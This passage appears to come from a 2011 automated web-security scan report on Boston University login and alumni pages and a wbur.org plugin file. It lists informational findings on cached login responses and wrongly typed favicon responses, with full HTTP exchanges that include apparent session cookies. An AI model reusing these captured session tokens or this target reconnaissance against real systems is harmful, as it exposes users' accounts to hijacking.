Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:24 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: Toya-ArxHDsAAFvabkM
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:59:24 GMT
X-BU-Main-Uniqueid: Toya-ArxHDsAAFIjVuMAAAAP
X-BU-Duration: D=24167271
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

12.5. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

Request

GET /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:04:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycRgrxHDsAAFvabks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:04:54 GMT
X-BU-Main-Uniqueid: ToycRgrxHDsAAGaoW@YAAAAi
X-BU-Duration: D=24104411
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

12.6. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

Request

GET /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyccwrxHDsAAGWJAWs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:05:39 GMT
X-BU-Main-Uniqueid: ToyccwrxHDsAAGarZZ4AAAAq
X-BU-Duration: D=24106310
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

12.7. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

Request

GET /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.21.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:06:23 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycnwrxHDsAAAJizks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:06:23 GMT
X-BU-Main-Uniqueid: ToycnwrxHDsAAGaXUrcAAAAm
X-BU-Duration: D=73727061
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

12.8. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Request

GET /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiNgrxHDYAAGUMufoAAAKF
X-BU-Duration: D=168596
X-BU-Backend: builtin (null)
Connection: close

<HTML>
<HEAD><TITLE>System Error</TITLE></HEAD>
<BODY TEXT="black" LINK="blue" VLINK="blue">
<CENTER>
<TABLE BORDER=0 CELLPADDING=2 WIDTH=60% BGCOLOR=FF00FF>
<TR><TD><TABLE CELLSPACING=0 CELLPADDING=4
...[SNIP]...

12.9. https://www.bu.edu/link/bin/uiscgi_studentlink  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_studentlink

Request

GET /link/bin/uiscgi_studentlink HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 17:47:35 GMT
Server: Apache/2.2.0 (BU-Version1)
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyYNwrxHD4AAFEANUgAAAKM
X-BU-Duration: D=361723
X-BU-Backend: builtin (null)
Connection: close

<!-- ----------------------------------------------------------------
This was generated for
at Wed Oct 5 13:47:36 2011
...[SNIP]...

12.10. http://www.wbur.org/wp-content/plugins/disqus-comment-system/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /wp-content/plugins/disqus-comment-system/xd_receiver.htm

Request

GET /wp-content/plugins/disqus-comment-system/xd_receiver.htm HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 26 Jul 2011 16:13:16 GMT
Accept-Ranges: bytes
ETag: "fa4a2dedae4bcc1:0",""
Server: Microsoft-IIS/7.0
Date: Wed, 05 Oct 2011 18:35:44 GMT
Connection: close
Content-Length: 297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <body> <script src="http://static.ak.connect.
...[SNIP]...

13. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


13.1. https://weblogin.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 01 Jun 2005 12:35:47 GMT
ETag: "41bd040100b7-e36-3f87a5c37eec0"
Accept-Ranges: bytes
Content-Length: 3638
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE03@Z8AAAAM
X-BU-Duration: D=7732
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................XX..........rrr.....''........==................................................................................
...[SNIP]...

13.2. https://www.bu.edu/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.bu.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Jan 2008 00:16:42 GMT
ETag: "1bf308d800001234-13e-444e574a4ce83"
Accept-Ranges: bytes
Content-Length: 318
X-BU-Main-Uniqueid: ToybDgrxHDYAAEaPWxgAAATW
X-BU-Duration: D=5560
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

..............(.......(....... .......................................``..ff..................................................wwwwwwwwwwwwwwww.........................Ww07w0...0qt.p...0pr.p...v0r.p...
...[SNIP]...

Report generated by XSS.CX at Wed Oct 05 13:58:55 CDT 2011.